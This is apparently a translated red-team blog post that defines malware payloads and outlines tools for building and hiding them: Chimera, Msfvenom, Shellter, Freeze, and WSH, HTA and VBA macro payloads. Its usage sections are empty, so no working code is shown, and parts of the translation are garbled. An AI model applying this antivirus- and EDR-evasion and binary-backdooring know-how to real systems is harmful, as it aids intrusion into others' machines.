№3. RedTeam-Tools. Payload

15 May 2023 3 minutes Author: Lady Liberty

Payload, what is it?

A payload is an action performed by malicious software, such as a virus or Trojan. The payload can corrupt files, deliver Trojans, damage hard drives, display messages, or open other files. The payload is activated when a file containing the malware is opened. Often, the payload is activated under certain conditions, such as when a certain date occurs on the computer. However, the payload is not the only program for these purposes. Spyware is software that collects and transmits information without your knowledge.

Spyware typically tracks information about websites visited, browser and system information, and the computer’s IP address. Adware is standalone software that displays advertisements when connected to the Internet. Most adware tracks what you browse on the Internet and shares that information with the interested party. A worm is a type of virus that finds vulnerable computers and copies itself to those systems. The worm is most commonly distributed through e-mail distributions, e-mail signature scripts, and shared folders on the network. Worms may or may not have a harmful payload. The worm’s payload makes the computer more susceptible to other viruses and Trojans.

Payload programs and tools

Chimera

Chimera is a PowerShell obfuscation script designed to bypass AMSI and anti-virus solutions. It digests malicious PS1s known to trigger AVs and uses string substitution and variable concatenation to avoid common detection signatures.

Installation:


Using:



Msfvenom



Msfvenom allows you to create payloads for different operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.

Configure listener



Msfvenom teams

Windows:



Linux:





Shellter

Shellter is a dynamic shellcode injection tool and the first truly dynamic PE infector.
It can be used to inject shellcode into native Windows applications (currently only 32-bit applications).
Shellter takes advantage of the original PE file structure and does not apply any modifications such as changing to allow memory access in partitions (unless the user wants it), adding an extra partition with RWE access and anything that looks fast when scanning A .IN.

Installation (Kali):



Using:

Just select a legitimate backdoor binary and run Shellter.



Freeze

Freeze is a payload creation tool used to bypass EDR security measures to execute shellcode in a stealthy manner.

Installation:



Using:





WSH

Creating a payload:



Perform:



HTA

Creating a payload:



Run: run the file

VBA

Creating a payload:



Execute: Set the Auto_Open() function in the document with macros

Found an error?
If you find an error, take a screenshot and send it to the bot.